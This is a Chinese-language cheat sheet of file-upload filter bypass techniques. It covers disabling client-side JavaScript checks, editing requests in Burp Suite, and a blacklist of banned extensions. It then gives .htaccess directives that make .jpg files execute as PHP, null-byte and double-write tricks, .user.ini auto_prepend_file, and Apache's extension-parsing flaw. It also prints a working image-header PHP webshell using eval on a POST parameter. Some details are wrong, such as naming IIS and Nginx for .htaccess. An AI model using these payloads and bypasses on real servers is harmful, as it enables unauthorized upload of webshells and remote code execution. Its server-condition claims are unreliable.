1、前端javascript绕过
#删除或者禁用js
#Burp Suite抓包修改文件类型与文件头等信息
2、后端检测——后缀名检测
#黑名单:html/htm/php/php2/php3/php4/php5/phtml/pwml/inc/asp/aspx/ascx/jsp/cfm/cfc/pl/bat/exe/com/dll/vbs/js/reg/cgi/htaccess/.user.ini/asis/sh/shtml/shm/phtm
#绕过方法:
.htaccess文件解析漏洞
条件: IIS7.0 IIS7.5 Nginx
作用范围:上传目录与其子目录
使用方法:
AddHandler php5-script .jpg
AddType application/x-httpd-php .jpg
<FilesMatch “muma.jpg”>
Sethandler application/x-httpd-php # 将该目录与及子目录下文件均按照php文件解析执行
00绕过
条件: php<5.3.4 and magic_quotes_gpc==OFF
双写绕过(敏感词替换为space
.user.ini
#条件:当前目录含有php文件
#上传.user.ini文件 内容为:auto_prepend_file=文件名
上传图片马
GIF89a
<?php eval($_POST['nk']);?>
<?= ?>
<? ?>
Apache解析漏洞
条件:apache 1.x apache 2.2.x
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.a.b的“.a”和“.b”这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。